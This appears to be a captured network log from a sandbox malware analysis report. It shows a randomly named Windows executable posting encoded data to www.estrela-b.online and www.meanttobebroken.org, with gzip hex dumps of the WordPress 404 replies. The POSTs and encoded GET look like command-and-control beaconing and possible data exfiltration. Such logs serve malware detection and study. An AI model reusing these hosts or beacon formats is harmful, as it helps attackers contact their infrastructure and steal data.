                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                                                                          Nov 14, 2024 16:29:01.154864073 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:28:59 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          14192.168.2.449970162.241.63.7780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:01.948430061 CET702OUTPOST /62tt/ HTTP/1.1
                                                                                                                                          Host: www.estrela-b.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.estrela-b.online
                                                                                                                                          Referer: http://www.estrela-b.online/62tt/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 35 48 4d 57 50 50 2f 4e 6a 49 72 31 71 69 57 36 5a 42 34 4d 61 42 43 32 45 46 30 34 48 2f 36 5a 7a 76 44 68 78 66 56 6e 70 78 71 4a 42 30 54 49 53 54 63 66 4e 35 53 62 62 33 4b 38 66 4d 32 30 68 48 69 54 75 50 72 68 78 71 59 4b 65 33 54 44 67 65 31 58 75 4b 5a 77 33 51 64 7a 32 37 36 57 71 31 4c 37 53 57 74 50 77 44 30 58 56 57 59 63 57 79 4d 49 6b 4b 73 33 51 76 7a 7a 46 58 6a 55 6a 71 6a 6e 73 75 6f 48 74 70 6e 6b 42 52 62 53 32 48 33 62 37 49 50 6d 65 6e 31 6f 44 52 77 39 5a 44 6e 39 79 51 65 32 78 45 59 34 6b 39 6f 4f 73 52 54 47 50 57 43 7a 6e 4a 49 4a 2f 7a 54 59 4a 4f 53 46 74 6c 42 55 67 41 4d 3d
                                                                                                                                          Data Ascii: n8C0=7c5XRYbmwMaD5HMWPP/NjIr1qiW6ZB4MaBC2EF04H/6ZzvDhxfVnpxqJB0TISTcfN5Sbb3K8fM20hHiTuPrhxqYKe3TDge1XuKZw3Qdz276Wq1L7SWtPwD0XVWYcWyMIkKs3QvzzFXjUjqjnsuoHtpnkBRbS2H3b7IPmen1oDRw9ZDn9yQe2xEY4k9oOsRTGPWCznJIJ/zTYJOSFtlBUgAM=
                                                                                                                                          Nov 14, 2024 16:29:03.459614038 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:02 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                                                                          Nov 14, 2024 16:29:03.459641933 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                                                                          Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:
                                                                                                                                          Nov 14, 2024 16:29:03.459656000 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                                                                          Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:
                                                                                                                                          Nov 14, 2024 16:29:03.459736109 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:02 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                                                                          Nov 14, 2024 16:29:03.459877014 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:02 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          15192.168.2.449981162.241.63.7780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:04.501388073 CET10784OUTPOST /62tt/ HTTP/1.1
                                                                                                                                          Host: www.estrela-b.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.estrela-b.online
                                                                                                                                          Referer: http://www.estrela-b.online/62tt/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 35 48 4d 57 50 50 2f 4e 6a 49 72 31 71 69 57 36 5a 42 34 4d 61 42 43 32 45 46 30 34 48 2f 79 5a 77 63 4c 68 78 38 39 6e 6f 78 71 4a 4d 55 54 4e 53 54 63 57 4e 35 4b 66 62 33 47 4b 66 4b 36 30 6a 6c 36 54 6d 65 72 68 37 71 59 4b 42 48 54 47 6b 65 31 65 75 4b 49 35 33 51 4e 7a 32 37 36 57 71 33 44 37 43 55 46 50 6a 54 30 55 53 57 59 51 53 79 4d 73 6b 4b 55 6e 51 76 2b 47 45 6e 44 55 69 4a 4c 6e 75 37 45 48 69 70 6e 71 47 52 62 4b 32 48 37 45 37 49 44 51 65 6e 52 4f 44 52 55 39 49 43 37 72 68 45 65 57 79 46 45 31 7a 4e 6b 4b 6e 51 72 71 57 33 57 58 70 6f 63 39 71 67 66 64 4a 73 43 41 79 47 70 44 6b 46 4d 43 48 35 76 72 78 65 73 4d 59 77 69 57 47 36 46 33 4d 61 50 76 4f 78 77 75 45 6f 35 61 78 30 72 43 54 66 4f 68 44 78 61 37 30 79 70 52 6e 55 53 47 45 4e 65 58 37 7a 4d 6a 47 43 48 63 67 50 68 41 6a 63 32 44 4e 59 64 34 66 32 34 41 6e 65 54 79 44 6a 45 65 33 57 6a 55 68 33 37 78 65 4b 67 75 59 71 76 77 54 72 42 51 48 78 30 47 76 6f 65 49 63 34 49 69 7a [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=7c5XRYbmwMaD5HMWPP/NjIr1qiW6ZB4MaBC2EF04H/yZwcLhx89noxqJMUTNSTcWN5Kfb3GKfK60jl6Tmerh7qYKBHTGke1euKI53QNz276Wq3D7CUFPjT0USWYQSyMskKUnQv+GEnDUiJLnu7EHipnqGRbK2H7E7IDQenRODRU9IC7rhEeWyFE1zNkKnQrqW3WXpoc9qgfdJsCAyGpDkFMCH5vrxesMYwiWG6F3MaPvOxwuEo5ax0rCTfOhDxa70ypRnUSGENeX7zMjGCHcgPhAjc2DNYd4f24AneTyDjEe3WjUh37xeKguYqvwTrBQHx0GvoeIc4IizIMbhusXmBQfQjIS8MpCO9cUdAeRHkDOhEZheC3axvFe9jGFAWsHklLcRlL1/6gmTsXTKim/fSy/X0tfP06om+d+QWVGxg90rRpzTB7xlR3F6eavPi49nGdnsMsjmjpVw7KO9ER4bvhKmiD8D1zSf2gBkxy1LZqNND+YP7jnhAXlFKYXvz0DtjUA5v3YG3CNGxteU9s/I1vwbWPLU/CejOX0tOZowZeojKnaaJvvJN1JAPVMotBo3T6ak5QHD8nxB9iAW3dT+sCWC+bjOvb+HXX7795VRO+5d6//0ZHtvvnti5Gjun8pGVFNaxzc3kicKy/BYr9uq+wY1Hi1hdOxefPFm1vsiJZFf37lM1ozDrJrI/H4DzWQkdp+cDniw2QTm3N0nrM8o47Rhioecgzwng+LDVUSn5MWjpWjGkoRNlJovAaNI/oEmpfnX8gCh1phXOTHU1NaJapRuUTkmByx6F/vsEKzdFNwdk2SR3LJg9K48ryRjYmd1CSoAj8sQVAyunJpkTuzFqnyhL7M7JmLzhJ1PeoOhCscV1or+VyCIPwPpf4dPKR98ZmfA0fYwrGiF0PusFuwb+lZ/pXbI4yeO71AhqzqOL1+tZ51qAQxM+qgKWHyA1A6PgtMhhdgQYjmDigTMPrTLO5QD6PvVwc1k1nD7TIFbAbFhb+ [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:29:05.227330923 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:05 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                          Connection: Upgrade
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          Content-Length: 1167
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                                                                          Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                                                                          Nov 14, 2024 16:29:05.227360964 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                                                                          Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          16192.168.2.449995162.241.63.7780928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:07.042069912 CET415OUTGET /62tt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=2eR3StT9zNfU5ywXH53OhrDvihvJYCZlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg6vEvKVbsoJZtubpb2SwU77vU2H/DTmEUgww= HTTP/1.1
                                                                                                                                          Host: www.estrela-b.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:29:07.798489094 CET582INHTTP/1.1 301 Moved Permanently
                                                                                                                                          Date: Thu, 14 Nov 2024 15:29:07 GMT
                                                                                                                                          Server: nginx/1.23.4
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 0
                                                                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                          X-Redirect-By: WordPress
                                                                                                                                          Location: http://estrela-b.online/62tt/?vva=cTUXfXqHQ4cd-Hh0&n8C0=2eR3StT9zNfU5ywXH53OhrDvihvJYCZlVhDhLCkeE+XsifzX8e145y6CEXHpSzhKOpTYXTK9W4/Sjnixpdzg6vEvKVbsoJZtubpb2SwU77vU2H/DTmEUgww=
                                                                                                                                          X-Newfold-Cache-Level: 2
                                                                                                                                          X-Endurance-Cache-Level: 2
                                                                                                                                          X-nginx-cache: WordPress
                                                                                                                                          X-Server-Cache: true
                                                                                                                                          X-Proxy-Cache: MISS


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          17192.168.2.450019141.193.213.1180928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:29:18.227695942 CET691OUTPOST /zdt7/ HTTP/1.1
                                                                                                                                          Host: www.meanttobebroken.org
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
